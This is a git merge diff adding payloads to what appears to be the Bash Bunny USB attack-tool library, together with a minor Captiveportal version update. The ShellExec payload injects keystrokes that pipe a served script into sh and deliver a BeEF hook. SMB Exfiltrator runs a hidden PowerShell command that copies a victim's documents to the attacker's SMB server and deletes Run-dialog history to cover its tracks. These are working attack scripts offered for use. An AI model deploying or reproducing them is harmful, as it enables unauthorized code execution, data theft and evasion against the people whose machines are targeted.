Merge remote-tracking branch 'upstream/master'

payloads/library/Captiveportal/README.md

@@ -1,7 +1,7 @@
 # Captive Portal for the Bash Bunny
 
 Author: Sebkinne  
-Version: 1.0
+Version: 1.1
 
 ## Description
 

payloads/library/Captiveportal/payload.txt

@@ -2,10 +2,7 @@
 #
 # Title:         Captiveportal
 # Author:        Sebkinne
-# Version:       1.0
+# Version:       1.1
-
-# Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
-https://forums.hak5.org/index.php?/topic/40237-install-tools/
 
 # Add or remove inputs here
 INPUTS=(username password)
@@ -18,6 +15,9 @@ ATTACKMODE RNDIS_ETHERNET
 #                  DO NOT EDIT BELOW THIS LINE                   #
 ##################################################################
 
+source bunny_helpers.sh
+WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION"
+
 # Sets up iptable forwarding and filters
 function setupNetworking() {
     echo 1 > /proc/sys/net/ipv4/ip_forward
@@ -30,8 +30,7 @@ function setupNetworking() {
 
 # Find payload directory and execute payload
 function startCaptiveportal() {
-#    cd $(dirname $(find /root/udisk/payloads/ -name portal.html))
+    cd $WORKINGPATH
-    cd /root/udisk/payloads/$SWITCH_POSITION
     chmod +x captiveportal
     ./captiveportal ${INPUTS[@]}
 }

payloads/library/ShellExec/evil.sh

@@ -0,0 +1,6 @@
+!#/bin/bash
+
+# opens browsers to the bunny's index.html page
+
+[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
+[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1

payloads/library/ShellExec/hook.js

@@ -0,0 +1 @@
+alert('This is where your evil JavaScript file would go')

payloads/library/ShellExec/index.html

@@ -0,0 +1,12 @@
+<html>
+<head>
+  <script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
+</head>
+
+<body>
+Nothing to see here!
+</body>
+
+</html>
+
+

payloads/library/ShellExec/payload.txt

@@ -0,0 +1,54 @@
+#!/bin/bash
+
+# Title:     ShellExec
+# Author:    audibleblink
+# Target:    Mac/Linux
+# Version:   1.0
+#
+# Create a web server on the BashBunny and forces
+# the victim download and execute a script.
+#
+# White            |  Ready
+# Ammber blinking  |  Waiting for server
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED R G B
+ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+
+source bunny_helpers.sh
+
+payload_dir=/root/udisk/payloads/$SWITCH_POSITION
+log_file=$payload_dir/shellexec.log
+
+cd $payload_dir
+
+# starting server
+LED R G 500
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED B 500
+
+Q GUI SPACE
+Q DELAY 300
+Q STRING terminal
+Q DELAY 100
+Q ENTER
+Q DELAY 2000
+
+# Q ALT F2 # swap with block above for linux
+# Q DELAY 100
+
+Q STRING curl "http://$HOST_IP/evil.sh" \| sh
+# in case curl isn't installed
+# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh 
+Q ENTER
+
+LED G

payloads/library/ShellExec/readme.md

@@ -0,0 +1,34 @@
+# ShellExec
+
+Author: audibleblink
+Version: 1.0
+
+## Description
+
+Serves malicious scripts or web pages from the Bunny and forces
+victims to curl and execute those scripts. Scripts can also force
+browsers to open a url on the bunny to do things like serve BeEF 
+hooks.
+
+## Configuration
+
+evil.py - script that is fetched with DuckyScript 
+(provided script opens a web page that serves a BeEF hook )
+
+hook.js - the aforementioned BeEF hook
+
+index.html - BeEF hook delivery page
+
+## Requirements
+
+Just plug and play
+
+## Status
+
+| LED              | Status              |
+| ---------        | -----------         |
+| White            |  Ready              |
+| Amber blinking   |  Waiting for server |
+| Blue blinking    |  Attacking          |
+| Green            |  Finished           |
+

payloads/library/smb_exfiltrator/payload.txt

@@ -0,0 +1,115 @@
+#!/bin/bash
+#
+# Title:         SMB Exfiltrator
+# Author:        Hak5Darren
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        Windows XP SP3+ (Powershell)
+# Attackmodes:   HID, Ethernet
+# 
+# 
+# Red Blink Fast.......Impacket not found
+# Red Blink Slow.......Target did not acquire IP address
+# Amber Blink Fast.....Initialization
+# Amber................HID Stage
+# Purple Blink Fast....Ethernet Stage
+# Blue Interstitial....Receiving Files
+# White................Moving loot to mass storage
+# Green................Finished
+#
+# OPTIONS
+LOOTDIR=/root/udisk/loot/smb_exfiltrator
+EXFILTRATE_FILES="*.pdf"
+CLEARTRACKS="yes" # yes or no
+
+# Initialization
+LED R G 100
+
+
+# Check for impacket. If not found, blink fast red.
+if [ ! -d /pentest/impacket/ ]; then
+  LED R 100
+  exit 1
+fi
+
+
+# HID STAGE
+# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
+# Once found, initiates file copy and exits
+LED R G
+ATTACKMODE HID
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK ENTER
+
+# Clear tracks?
+if [ $CLEARTRACKS == "yes" ]; then
+   QUACK DELAY 500
+   QUACK GUI r
+   QUACK DELAY 500
+   QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+   QUACK ENTER
+fi
+
+
+# ETHERNET STAGE
+LED R B 100
+ATTACKMODE RNDIS_ETHERNET
+
+
+# Setup SMB server to receive loot in staging area
+mkdir -p /root/loot/smb_exfiltrator/temp/
+# house cleaning
+rm -rf /root/loot/smb_exfiltrator/temp/*
+# Fire up SMB Server
+/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &
+
+
+# Source bunny_helpers.sh to get environment variables
+source bunny_helpers.sh
+
+
+# Give target a chance to start exfiltration
+sleep 2
+
+
+# Make loot directory based on hostname (increment for multiple uses)
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+
+# Check target IP address. If unset, blink slow red.
+if [ -z "${TARGET_IP}" ]; then
+    LED R 1000
+	exit 1
+fi
+
+
+# Wait until exfiltration is complete
+last=0
+current=1
+while [ "$last" != "$current" ]; do
+   last=$current
+   current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
+   LED B
+   sleep 1
+   LED R B 100
+   sleep 9
+   # Files are still being copied. Loop. 
+   # (Issue may exist if file takes longer than 10s to copy)
+done
+
+
+# Move files from staging area to loot directory
+LED R G B
+mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
+sync; sleep 1; sync
+
+# Trap is clean
+LED G

payloads/library/smb_exfiltrator/readme.md

@@ -0,0 +1,31 @@
+# SMB Exfiltrator
+
+* Author: Hak5Darren
+* Version: Version 1.0
+* Target: Windows XP SP3+ (Powershell)
+* Category: Exfiltration
+* Attackmodes: HID, Ethernet
+
+## Description
+
+Exfiltrates select files from users's documents folder via SMB.
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
+
+## Configuration
+
+Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. 
+
+## STATUS
+
+| LED                 | Status                                 |
+| ------------------- | -------------------------------------- |
+| Red (fast blink)    | Impacket not found in /pentest         |
+| Red (slow blink)    | Setup Failed. Target didn't obtain IP  |
+| Purple              | HID Stage                              |
+| Purple (fast blink) | Ethernet Stage                         |
+| Blue (interupt)     | Receiving files                        |
+| White               | Files received, moving to mass storage |
+| Green               | Finished                               |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")